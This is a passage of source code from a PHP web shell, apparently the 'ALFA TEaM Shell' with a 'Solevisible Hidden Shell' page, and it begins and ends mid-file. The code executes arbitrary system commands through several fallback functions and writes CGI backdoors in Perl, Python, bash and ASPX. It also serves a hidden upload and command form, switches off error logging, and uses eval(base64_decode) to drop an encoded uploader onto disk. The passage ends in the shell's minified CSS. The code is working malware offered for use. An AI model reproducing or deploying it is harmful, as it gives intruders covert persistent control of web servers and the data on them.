"rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";\r\n\t\t\t$aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";\r\n\t\t\tif($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;\r\n\t\t\tif($lang == "aspx"){\r\n\t\t\t\talfaWriteTocgiapi("aspx.aspx",$aspx);\r\n\t\t\t}else{\r\n\t\t\t\talfaWriteTocgiapi($lang.".alfa",$source);\r\n\t\t\t}\r\n\t\t\talfacgihtaccess(\'cgi\', "alfacgiapi/");\r\n\t\t}else{\r\n\t\t\t$lang = $_COOKIE["alfacgiapi"];\r\n\t\t}\r\n\t\t$cgi_ext = ".alfa";\r\n\t\tif($lang=="aspx"){\r\n\t\t\t$cgi_ext = ".aspx";\r\n\t\t}\r\n\t\t$cgi_url = __ALFA_DATA_FOLDER__."/alfacgiapi/".$lang.$cgi_ext;\r\n\t\t$cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS[\'cwd\'].";".$cmd);\r\n\t\tif($is_curl){\r\n\t\t\t$address = ($_SERVER[\'SERVER_PORT\'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;\r\n\t\t\t$post = new AlfaCURL();\r\n\t\t\t$data = $post->Send($address, "post", $cmd);\r\n\t\t}elseif($is_socket){\r\n\t\t\t$server = $_SERVER["SERVER_NAME"];\r\n\t\t\t$uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;\r\n\t\t\t$data = _alfa_fsockopen($server,$uri,$cmd);\r\n\t\t}\r\n\t\t$out = "";\r\n\t\tif(strpos($data, "[solevisible~api]") !== false && strpos($data, \'[solevisible~api]<pre>"+output+"</pre>\') === false){\r\n\t\t\tif($set_cookie){\r\n\t\t\t\t__alfa_set_cookie("alfacgiapi", $lang);\r\n\t\t\t}\r\n\t\t\tif(@preg_match("/<pre>(.*?)<\\/pre>/s", $data, $res)){\r\n\t\t\t\t$out = $res[1];\r\n\t\t\t}\r\n\t\t}elseif($lang=="perl"){\r\n\t\t\treturn _alfa_cgicmd($cmd_pure,"py",$set_cookie);\r\n\t\t}elseif($lang=="py"){\r\n\t\t\treturn _alfa_cgicmd($cmd_pure,"bash",$set_cookie);\r\n\t\t}elseif($lang=="bash" && $GLOBALS[\'sys\']=="win"){\r\n\t\t\treturn _alfa_cgicmd($cmd_pure,"aspx",$set_cookie);\r\n\t\t}else{\r\n\t\t\tif($set_cookie){\r\n\t\t\t\t__alfa_set_cookie("alfacgiapi_mode", "off");\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn trim($out);\r\n\t}else{\r\n\t\treturn "";\r\n\t}\r\n}\r\nfunction alfaGetCwd(){\r\n\tif(function_exists("getcwd")){\r\n\t\treturn @getcwd();\r\n\t}else{\r\n\t\treturn dirname($_SERVER["SCRIPT_FILENAME"]);\r\n\t}\r\n}\r\nfunction alfaEx($in,$re=false,$cgi=true,$all=false){\r\n\t$data = _alfa_php_cmd($in,$re);\r\n\tif(empty($data)&&$cgi||$all){\r\n\t\tif($GLOBALS[\'sys\']==\'unix\'){\r\n\t\t\tif(strlen(_alfa_php_cmd("whoami"))==0||$all){\r\n\t\t\t\t$cmd = _alfa_cgicmd($in);\r\n\t\t\t\tif(!empty($cmd)){\r\n\t\t\t\t\treturn $cmd;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn $data;\r\n}\r\nfunction _alfa_php_cmd($in,$re=false){\r\n$out=\'\';\r\ntry{\r\nif($re)$in=$in." 2>&1";\r\nif(function_exists(\'exec\')){\r\n@exec($in,$out);\r\n$out = @join("\\n",$out);\r\n}elseif(function_exists(\'passthru\')) {\r\nob_start();\r\n@passthru($in);\r\n$out = ob_get_clean();\r\n}elseif(function_exists(\'system\')){\r\nob_start();\r\n@system($in);\r\n$out = ob_get_clean();\r\n} elseif (function_exists(\'shell_exec\')) {\r\n$out = shell_exec($in);\r\n}elseif(function_exists("popen")&&function_exists("pclose")){\r\nif(is_resource($f = @popen($in,"r"))){\r\n$out = "";\r\nwhile(!@feof($f))\r\n$out .= fread($f,1024);\r\npclose($f);\r\n}\r\n}elseif(function_exists(\'proc_open\')){\r\n$pipes = array();\r\n$process = @proc_open($in.\' 2>&1\', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);\r\n$out=@stream_get_contents($pipes[1]);\r\n}elseif(class_exists(\'COM\')){\r\n$alfaWs = new COM(\'WScript.shell\');\r\n$exec = $alfaWs->exec(\'cmd.exe /c \'.$_POST[\'alfa1\']);\r\n$stdout = $exec->StdOut();\r\n$out=$stdout->ReadAll();\r\n}\r\n}catch(Exception $e){}\r\nreturn $out;\r\n}\r\nfunction _alfa_fsockopen($server,$uri,$post){\r\n\t$socket = @fsockopen($server, 80, $errno, $errstr, 15);\r\n\tif($socket){\r\n\t\t$http  = "POST {$uri} HTTP/1.0\\r\\n";\r\n\t\t$http .= "Host: {$server}\\r\\n";\r\n\t\t$http .= "User-Agent: " . $_SERVER[\'HTTP_USER_AGENT\'] . "\\r\\n";\r\n\t\t$http .= "Content-Type: application/x-www-form-urlencoded\\r\\n";\r\n\t\t$http .= "Content-length: " . strlen($post) . "\\r\\n";\r\n\t\t$http .= "Connection: close\\r\\n\\r\\n";\r\n\t\t$http .= $post . "\\r\\n\\r\\n";\r\n\t\tfwrite($socket, $http);\r\n\t\t$contents = "";\r\n\t\twhile (!@feof($socket)) {\r\n\t\t\t$contents .= @fgets($socket, 4096);\r\n\t\t}\r\n\t\tlist($header, $body) = explode("\\r\\n\\r\\n", $contents, 2);\r\n\t\t@fclose($socket);\r\n\t\treturn $body;\r\n\t}else{\r\n\t\treturn "";\r\n\t}\r\n}\r\nif(isset($_GET["solevisible"])){\r\n@error_reporting(E_ALL ^ E_NOTICE);\r\necho \'<html>\';\r\necho "<title>Solevisible Hidden Shell</title>";\r\necho "<body bgcolor=#000000>";\r\necho \'<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">\'.(function_exists(\'php_uname\')?php_uname():\'???\').\'</font></b></big>\';\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif($safe_mode){$r = "<b style=\'color: red\'>On</b>";}else{$r = "<b style=\'color: green\'>Off</b>";}\r\necho "<br><b style=\'color: #7CFC00\'>OS: </font><font color=white>" . PHP_OS . "</font><br>";\r\necho "<b style=\'color: #7CFC00\'>Software: </font><font color=white>" . $_SERVER [\'SERVER_SOFTWARE\'] . "</font><br>";\r\necho "PHP Version: <font color=white>" . PHP_VERSION .  "</font><br />";\r\necho "PWD:<font color=#FFFFFF> " . str_replace("\\\\","/",@alfaGetCwd()) . "/<br />";\r\necho "<b style=\'color: #7CFC00\'>Safe Mode : $r<br>";\r\necho"<font color=#7CFC00>Disable functions : </font>";\r\n$disfun = @ini_get(\'disable_functions\');\r\nif(empty($disfun)){$disfun = \'<font color="green">NONE</font>\';}\r\necho"<font color=red>";\r\necho "$disfun";\r\necho"</font><br>";\r\necho "<b style=\'color: #7CFC00\'>Your Ip Address is :  </font><font color=white>" . $_SERVER[\'REMOTE_ADDR\'] . "</font><br>";\r\necho "<b style=\'color: #7CFC00\'>Server Ip Address is :  </font><font color=white>".(function_exists(\'gethostbyname\')?@gethostbyname($_SERVER["HTTP_HOST"]):\'???\')."</font><br><p>";\r\necho \'<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';\r\necho \'CWD: <input type="text" name="cwd" value="\'.str_replace("\\\\","/",@alfaGetCwd()).\'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(@move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], __ZGVjb2Rlcg(@$_POST[\'cwd\']).\'/\'.$_FILES[\'file\'][\'name\'])){echo \'<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>\'; }\r\nelse{echo \'<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>\'; }\r\n}\r\necho \'<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>\r\n<hr><pre>\';\r\nif(isset($_POST[\'command_solevisible\'])){\r\nif(strtolower(substr(PHP_OS,0,3))=="win")$separator=\'&\';else $separator=\';\';\r\n$solevisible = "cd \'".addslashes(str_replace("\\\\","/",@alfaGetCwd()))."\'".$separator."".__ZGVjb2Rlcg($_POST[\'command_solevisible\']);\r\necho alfaEx($solevisible);\r\n}\r\necho\'</pre>\r\n</body></html>\';\r\nexit;}\r\n@error_reporting(E_ALL ^ E_NOTICE);\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'magic_quotes_runtime\', 0);\r\n@set_time_limit(0);\r\nif(function_exists(\'set_magic_quotes_runtime\')){\r\n@set_magic_quotes_runtime(0);\r\n}\r\nforeach($_POST as $key => $value){\r\nif(is_array($_POST[$key])){\r\n$i=0;\r\nforeach($_POST[$key] as $f) {\r\n$f = trim(str_replace(\' \', \'+\',$f));\r\n$_POST[$key][$i] = decrypt_post($f);\r\n$i++;\r\n}\r\n}else{\r\n$value = trim(str_replace(\' \', \'+\',$value));\r\n$_POST[$key] = decrypt_post($value);\r\n}\r\n}\r\n$default_action = \'FilesMan2\';//\'FilesMan\';\r\n$default_use_ajax = true;\r\n$default_charset = \'Windows-1251\';\r\nif(strtolower(substr(PHP_OS,0,3))=="win")\r\n$GLOBALS[\'sys\']=\'win\';\r\nelse\r\n$GLOBALS[\'sys\']=\'unix\';\r\n$GLOBALS[\'home_cwd\'] = @alfaGetCwd();\r\n$GLOBALS["need_to_update_header"] = "false";\r\n$GLOBALS[\'glob_chdir_false\'] = false;\r\nif(isset($_POST[\'c\'])){\r\nif(!@chdir($_POST[\'c\'])){\r\n\t$GLOBALS[\'glob_chdir_false\'] = true;\r\n}\r\n}\r\n$GLOBALS[\'cwd\'] = (isset($_POST[\'c\']) && @is_dir($_POST[\'c\']) ?$_POST[\'c\']:@alfaGetCwd());\r\nif($GLOBALS[\'glob_chdir_false\']){\r\n\t$GLOBALS[\'cwd\'] = (isset($_POST[\'c\']) && !empty($_POST[\'c\']) ? $_POST[\'c\'] : @alfaGetCwd());\r\n}\r\nif($GLOBALS[\'sys\'] == \'win\'){\r\n$GLOBALS[\'home_cwd\'] = str_replace("\\\\", "/", $GLOBALS[\'home_cwd\']);\r\n$GLOBALS[\'cwd\'] = str_replace("\\\\", "/", $GLOBALS[\'cwd\']);\r\n}\r\nif($GLOBALS[\'cwd\'][strlen($GLOBALS[\'cwd\'])-1] != \'/\' )$GLOBALS[\'cwd\'] .= \'/\';\r\nif(!function_exists(\'sys_get_temp_dir\')){function sys_get_temp_dir() {foreach (array(\'TMP\', \'TEMP\', \'TMPDIR\') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS[\'__file_path\'], \'\');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}\r\nif(!function_exists("mb_strlen")){\r\n\tfunction mb_strlen($str, $c=""){\r\n\t\treturn strlen($str);\r\n\t}\r\n}\r\nif(!function_exists("mb_substr")){\r\n\tfunction mb_substr($str, $start, $end, $c=""){\r\n\t\treturn substr($str, $start, $end);\r\n\t}\r\n}\r\ndefine("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace(\'\\\\\',\'/\',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable(\'.\')?\'.\':false)) : false));\r\nfunction alfahead(){\r\n$GLOBALS[\'__ALFA_SHELL_CODE\'] = \'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+\';\r\n$alfa_uploader = \'$x = base64_decode("\'.$GLOBALS[\'__ALFA_SHELL_CODE\'].\'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);\';\r\ndefine("ALFA_UPLOADER", "eval(base64_decode(\'".__ZW5jb2Rlcg($alfa_uploader)."\'))");\r\nif(!isset($_POST[\'ajax\'])){\r\nfunction Alfa_GetDisable_Function(){\r\n$disfun = @ini_get(\'disable_functions\');\r\n$afa = \'<span class="header_show_all">All Functions Accessible</span>\';\r\nif(empty($disfun))return($afa);\r\n$s = explode(\',\',$disfun);\r\n$s = array_unique($s);\r\n$i=0;\r\n$b=0;\r\n$func = array(\'system\',\'exec\',\'shell_exec\',\'proc_open\',\'popen\',\'passthru\',\'symlink\',\'dl\');\r\n$black_list = array();\r\n$allow_list = array();\r\nforeach($s as $d){\r\n\t$d=trim($d);\r\n\tif(empty($d)||!is_callable($d))continue;\r\n\tif(!function_exists($d)){\r\n\t\tif(in_array($d,$func)){\r\n\t\t\t$dis .= $d." | ";$b++;\r\n\t\t\t$black_list[] = $d;\r\n\t\t}else{\r\n\t\t\t$allow_list[] = $d;\r\n\t\t}\r\n\t\t$i++;\r\n\t}\r\n}\r\nif($i==0)return($afa);\r\nif($i <= count($func)){\r\n$all = array_values(array_merge($black_list, $allow_list));\r\nreturn(\'<span class="disable_functions">\'.implode(" | ", $all).\'</span>\');\r\n}\r\nreturn(\'<span class="disable_functions">\'.$dis.\'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\\\'GetDisFunc\\\',null,\\\'wp\\\');"><span class="header_show_all">Show All (\'.$i.\')</span></a>\');\r\n}\r\nfunction AlfaNum(){\r\n$args = func_get_args();\r\n$alfax = array();\r\n$find = array();\r\nfor($i=1;$i<=10;$i++){\r\n$alfax[] = $i;\r\n}\r\nforeach($args as $arg){\r\n$find[] = $arg;\r\n}\r\necho \'<script>\';\r\nforeach($alfax as $alfa){\r\nif(in_array($alfa,$find))\r\ncontinue;\r\necho \'alfa\'.$alfa."_=";\r\n}\r\necho \'""</script>\';\r\n}\r\nif(empty($_POST[\'charset\']))\r\n$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\r\n$freeSpace = function_exists(\'diskfreespace\')?@diskfreespace($GLOBALS[\'cwd\']):\'?\';\r\n$totalSpace = function_exists(\'disk_total_space\')?@disk_total_space($GLOBALS[\'cwd\']):\'?\';\r\n$totalSpace = $totalSpace?$totalSpace:1;\r\n$on="<span class=\'header_on\'> ON </span>";\r\n$of="<span class=\'header_off\'> OFF </span>";\r\n$none="<span class=\'header_none\'> NONE </span>";\r\nif(function_exists(\'ssh2_connect\'))\r\n$ssh2=$on;\r\nelse\r\n$ssh2=$of;\r\nif(function_exists(\'curl_version\'))\r\n$curl=$on;\r\nelse\r\n$curl=$of;\r\nif(function_exists(\'mysql_get_client_info\')||class_exists(\'mysqli\'))\r\n$mysql=$on;\r\nelse\r\n$mysql=$of;\r\nif(function_exists(\'mssql_connect\'))\r\n$mssql=$on;\r\nelse\r\n$mssql=$of;\r\nif(function_exists(\'pg_connect\'))\r\n$pg=$on;\r\nelse\r\n$pg=$of;\r\nif(function_exists(\'oci_connect\'))\r\n$or=$on;\r\nelse\r\n$or=$of;\r\nif(@ini_get(\'disable_functions\'))\r\n$disfun=@ini_get(\'disable_functions\');\r\nelse\r\n$disfun="All Functions Enable";\r\nif(@ini_get(\'safe_mode\'))\r\n$safe_modes="<span class=\'header_off\'>ON</span>";\r\nelse\r\n$safe_modes="<span class=\'header_on\'>OFF</span>";\r\n$cgi_shell="<span class=\'header_off\' id=\'header_cgishell\'>OFF</span>";\r\nif(@ini_get(\'open_basedir\')){\r\n$basedir_data = @ini_get(\'open_basedir\');\r\nif(strlen($basedir_data)>120){\r\n$open_b=substr($basedir_data,0, 120)."...";\r\n}else{\r\n$open_b = $basedir_data;\r\n}\r\n}else{$open_b=$none;}\r\nif(@ini_get(\'safe_mode_exec_dir\'))\r\n$safe_exe=@ini_get(\'safe_mode_exec_dir\');\r\nelse\r\n$safe_exe=$none;\r\nif(@ini_get(\'safe_mode_include_dir\'))\r\n$safe_include=@ini_get(\'safe_mode_include_dir\');\r\nelse\r\n$safe_include=$none;\r\nif(!function_exists(\'posix_getegid\'))\r\n{\r\n$user = function_exists("get_current_user")?@get_current_user():"????";\r\n$uid = function_exists("getmyuid")?@getmyuid():"????";\r\n$gid = function_exists("getmygid")?@getmygid():"????";\r\n$group = "?";\r\n}else{\r\n$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");\r\n$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");\r\n$user = $uid[\'name\'];\r\n$uid = $uid[\'uid\'];\r\n$group = $gid[\'name\'];\r\n$gid = $gid[\'gid\'];\r\n}\r\n$cwd_links = \'\';\r\n$path = explode("/", $GLOBALS[\'cwd\']);\r\n$n=count($path);\r\nfor($i=0; $i<$n-1; $i++) {\r\n$cwd_links .= "<a class=\'header_pwd\' onclick=\'g(\\"FilesMan\\",\\"";\r\n$cach_cwd_path = "";\r\nfor($j=0; $j<=$i; $j++){\r\n$cwd_links .= $path[$j].\'/\';\r\n$cach_cwd_path .= $path[$j].\'/\';\r\n}\r\n$cwd_links .= "\\")\' path=\'".$cach_cwd_path."\' href=\'#action=fileman&path=".$cach_cwd_path."\'>".$path[$i]."/</a>";\r\n}\r\n$drives = "";\r\nforeach(range(\'a\',\'z\') as $drive)\r\nif(@is_dir($drive.\':\\\\\'))\r\n$drives .= \'<a href="javascript:void(0);" class="header_drive" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n$csscode =\'\t-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;\';\r\necho \'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\r\n<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />\r\n<link href="\'.__showicon(\'alfamini\').\'" rel="icon" type="image/x-icon"/>\r\n<title>..:: \'.$_SERVER[\'HTTP_HOST\'].\' ~ ALFA TEaM Shell - v\'.__ALFA_VERSION__.\'-\'.__ALFA_CODE_NAME__.\' ::..</title>\r\n<style type="text/css">\';?>\r\n.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes 